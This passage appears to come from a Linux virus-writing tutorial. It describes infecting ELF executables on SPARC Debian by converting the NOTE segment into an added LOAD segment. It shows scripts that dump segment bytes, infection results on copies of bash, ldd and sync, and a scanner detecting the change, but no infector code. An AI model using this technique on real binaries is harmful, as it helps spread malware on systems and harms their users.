Perfection is reached, not when there is no longer anything to add, but when there is no longer anything to take away. | |
| Antoine de Saint-Exupery |
This is the platform dependent part of Additional code segments (i).
Using the scanner in Scanning for NOTE (i) we exercise a systematic search for targets. The scripts and intermediate steps are shown in Food for segment padding. Here come just the results:
Output: out/sparc-debian2.2-linux/scanner/additional_cs/find-ok
631 out/sparc-debian2.2-linux/scanner/additional_cs/big.dynamic.ok
2 out/sparc-debian2.2-linux/scanner/additional_cs/big.static.ok
633 total |
Output: out/sparc-debian2.2-linux/scanner/additional_cs/infect.filetype
/bin/bash: ELF 32-bit MSB executable, SPARC, version 1, dynamically
linked (uses shared libs), stripped
/usr/bin/ldd: ELF 32-bit MSB executable, SPARC, version 1, statically
linked, stripped
/bin/sync: ELF 32-bit MSB executable, SPARC, version 1, dynamically
linked (uses shared libs), stripped |
And this should give you an idea of minimum and maximum size of found segments.
Output: out/sparc-debian2.2-linux/scanner/additional_cs/big.dynamic
CHECK: /usr/lib/lddstub
CHECK: src/scanner/additional_cs/action.inc#9
CHECK: (phdr_note) != (0)
CHECK: 0 != 0; 0 != 0
files=632; ok=631; detected=1; min=32; max=32 |
Before we overwrite the section we should take a close at what's in there. Both objdump and readelf can show the contents of sections, specified by name or index. There is no direct access according to section type. The name of the section differs between Linux and Solaris, however. Unfortunately the output of objdump -h does not include section types. As a work around we can search for a pattern matching both names. If more than one entry is found the first one will win.
Command: pre/sparc-debian2.2-linux/additional_cs/note/objdump-name.sh
#!/bin/bash
shell=$( /bin/sed 1q \
out/sparc-debian2.2-linux/scanner/additional_cs/infect )
[ -x ${shell} ] || exit 1
/bin/echo shell="${shell}"
/usr/bin/objdump -h ${shell} \
| /usr/bin/perl-5.005 -ane \
'if (/\s+\.note[A-Za-z\.-]*\s+/) {
print "index=$F[0]\nname=\"$F[1]\"\n# $_";
exit 0;
}' |
Output: out/sparc-debian2.2-linux/additional_cs/note/objdump-name
shell=/bin/bash
index=1
name=".note.ABI-tag"
# 1 .note.ABI-tag 00000020 0000000000010108 0000000000010108 00000108 2**2 |
objdump can disassemble sections specified by name. There is no similar support for segments. There is nothing like a plain old hexdump. And even the disassembly is refused if the executable has no symbol table. But don't let useless oddity stop our zeal.
Command: pre/sparc-debian2.2-linux/additional_cs/note/objdump.sh
#!/bin/bash
. out/sparc-debian2.2-linux/additional_cs/note/objdump-name
/usr/bin/objdump -j ${name} -d ${shell} \
2>&1 | pre/sparc-debian2.2-linux/magic_elf/objdump_format.pl |
Output: out/sparc-debian2.2-linux/additional_cs/note/objdump
10108: 00 00 00 04 unimp 0x4 |
readelf can hexdump sections specified by index. There is no similar support for segments. But at least the output of readelf -S includes section types, so we don't have to rely on matching the name.
Command: pre/sparc-debian2.2-linux/additional_cs/note/readelf-name.sh
#!/bin/bash
shell=$( /bin/sed 1q \
out/sparc-debian2.2-linux/scanner/additional_cs/infect )
[ -x ${shell} ] || exit 1
/bin/echo shell="${shell}"
/usr/bin/readelf -S ${shell} \
| /usr/bin/perl-5.005 '-anF/[\s\[\]]+/' -e \
'if ($F[3] eq "NOTE") {
print "index=$F[1]\nname=\"$F[2]\"\n";
exit 0;
}' |
Output: out/sparc-debian2.2-linux/additional_cs/note/readelf-name
shell=/bin/bash
index=2
name=".note.ABI-tag" |
Command: pre/sparc-debian2.2-linux/additional_cs/note/readelf.sh
#!/bin/bash
. out/sparc-debian2.2-linux/additional_cs/note/readelf-name
/usr/bin/readelf -x ${index} ${shell}
/bin/echo "section=${index} status=$?" |
The output of both readelf 2.11.93 (shipped with Red Hat 7.3) and readelf 2.13.9 (shipped with Red Hat 8.0) is broken. Looks like a very strange byte order issue on i386. And readelf 2.11 on Solaris 9 core dumps right out on -x.
Output: out/sparc-debian2.2-linux/additional_cs/note/readelf
Hex dump of section '.note.ABI-tag':
0x00010108 00000004 00000010 00000001 474e5500 ............GNU.
0x00010118 00000000 00000002 00000000 00000000 ................
section=2 status=0 |
Enough of that crap. To actually see the bytes of a segment we first have to retrieve the file offset. The following evil perl script could almost be implemented with even more evil sed. But I found no equally evil way to convert numbers from hexadecimal.
Command: pre/sparc-debian2.2-linux/additional_cs/note/offset.sh
#!/bin/bash
shell=$( /bin/sed 1q \
out/sparc-debian2.2-linux/scanner/additional_cs/infect )
echo "shell='${shell}'"
/usr/bin/objdump -p ${shell} \
| /usr/bin/perl-5.005 -ne \
'if (s/^\s*NOTE\s+//) {
# convert all hexadecimal fields into assignments
s/ *(\w+)\s+0x([0-9a-fA-F]+)/sprintf("%s=%d\n", $1, hex($2))/ge;
s/\n .*//; # cut off trailing "align 2**2"
$_ .= <>; # append second line
# convert all appended hexadecimal fields into assignments
s/ *(\w+)\s+0x([0-9a-fA-F]+)/sprintf("%s=%d\n", $1, hex($2))/ge;
s/\n .*//; # cut off trailing "flags r--"
print $_;
exit 0;
}' |
Output: out/sparc-debian2.2-linux/additional_cs/note/offset
shell='/bin/bash'
off=264
vaddr=65800
paddr=65800
filesz=32
memsz=32 |
At this point the actual dump is just a variation on Strings and dumps. A classic byte-wise octal dump using only classic options of classic tools:
Command: pre/sparc-debian2.2-linux/additional_cs/note/od.sh
#!/bin/bash
. out/sparc-debian2.2-linux/additional_cs/note/offset
/bin/dd if=${shell} bs=1 skip=${off} count=${filesz} \
| /usr/bin/od -c |
Output: out/sparc-debian2.2-linux/additional_cs/note/od
0000000 \0 \0 \0 004 \0 \0 \0 020 \0 \0 \0 001 G N U \0
0000020 \0 \0 \0 \0 \0 \0 \0 002 \0 \0 \0 \0 \0 \0 \0 \0
0000040 |
hexdump is both more astetical and easier to use. Unfortunately the version shipped with Slackware 8.1 fails on -s.
Command: pre/sparc-debian2.2-linux/additional_cs/note/hexdump.sh
#!/bin/bash
. out/sparc-debian2.2-linux/additional_cs/note/offset
/usr/bin/hexdump \
-f ./src/format.hex \
-s ${off} -n ${filesz} < ${shell} |
Output: out/sparc-debian2.2-linux/additional_cs/note/hexdump
0108 00 00 00 04 00 00 00 10 00 00 00 01 47 4e 55 00 ............GNU.
0118 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 ................ |
xxd is obviously the best.
Command: pre/sparc-debian2.2-linux/additional_cs/note/xxd.sh
#!/bin/bash
. out/sparc-debian2.2-linux/additional_cs/note/offset
/usr/bin/xxd -l ${filesz} -s ${off} ${shell} |
Output: out/sparc-debian2.2-linux/additional_cs/note/xxd
0000108: 0000 0004 0000 0010 0000 0001 474e 5500 ............GNU.
0000118: 0000 0000 0000 0002 0000 0000 0000 0000 ................ |
Output: out/sparc-debian2.2-linux/additional_cs/e1i1/infect
/bin/bash ... wrote 76 bytes, Ok
/usr/bin/ldd ... wrote 76 bytes, Ok
/bin/sync ... wrote 76 bytes, Ok
files=3; ok=3; failed=0 |
Output = Command: out/sparc-debian2.2-linux/additional_cs/test-e1i1.sh
#!tmp/sparc-debian2.2-linux/additional_cs/e1i1/bash_infected
echo "pid=[$$]"
cd tmp/sparc-debian2.2-linux/additional_cs/e1i1
echo "TERM=[$TERM]"
./ldd_infected -h | sed 1q
./sync_infected
echo "---"
/bin/cat bash_infected > strip_bash_infected \
&& /usr/bin/strip strip_bash_infected \
&& /bin/chmod 755 strip_bash_infected \
&& ./strip_bash_infected -version |
Output: out/sparc-debian2.2-linux/additional_cs/test-e1i1
ELFpid=[13303]
TERM=[xterm]
./ldd_infected: invalid option -- h
ELFusage: ./ldd_infected [-vVdr] prog ...
ELF---
BFD: strip_bash_infected: warning: Empty loadable segment detected
out/sparc-debian2.2-linux/additional_cs/test-e1i1.sh: line 12: 13310 Segmentation fault ./strip_bash_infected -version |
This method works, but is not safe to strip. Well, let's compare the infected target with the the original.
Output: out/sparc-debian2.2-linux/additional_cs/readelf
-rwxr-xr-x 1 alba alba 513020 Feb 15 23:58 bash_infected
-rwxr-xr-x 1 alba alba 512932 Feb 15 23:58 strip_bash_infected
-rwxr-xr-x 1 root root 512932 Jul 17 2002 /bin/bash
Elf file type is EXEC (Executable file)
Entry point 0xe3b0
There are 6 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x00010034 0x00010034 0x000c0 0x000c0 R E 0x4
INTERP 0x0000f4 0x000100f4 0x000100f4 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x00010000 0x00010000 0x75763 0x75763 R E 0x10000
LOAD 0x075768 0x00095768 0x00095768 0x057cc 0x09070 RWE 0x10000
DYNAMIC 0x07ae84 0x0009ae84 0x0009ae84 0x000b0 0x000b0 RW 0x4
LOAD 0x07d3b0 0x0000e3b0 0x0000e3b0 0x0004c 0x0004c R E 0x10000
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.bss .rela.plt .init .text .fini .rodata
03 .data .eh_frame .ctors .dtors .plt .got .dynamic .bss
04 .dynamic
05 |
File size grew 513020 - 512932 = 88 bytes. This number is meaningless if the original target was stripped. In that case the additional bytes of the symbol table far outweigh the infection. Anyway, even an unmodified entry point is pointless in this case. Anybody can notice LOAD instead of NOTE.
Command: pre/sparc-debian2.2-linux/additional_cs/scan_segment.sh
#!/bin/bash
TEVWH_TMP=tmp/sparc-debian2.2-linux
export TEVWH_TMP
shell=$( /bin/sed 1q \
out/sparc-debian2.2-linux/scanner/segment_padding/infect )
/bin/echo "${shell}
tmp/sparc-debian2.2-linux/additional_cs/e1i1/${shell##*/}_infected" \
| tmp/sparc-debian2.2-linux/scanner/segment_padding |
Output: out/sparc-debian2.2-linux/additional_cs/scan
/bin/bash ... delta=0x10005, Ok
CHECK: additional_cs/e1i1/bash_infected
CHECK: src/one_step_closer/get_seg.inc#25
CHECK: (nr_load) == (2)
CHECK: 3 == 2; 0x3 == 0x2
files=2; ok=1; det_page=1; det_align=0; min=0x10005; max=0x10005 |
Case closed. Guilty of failure.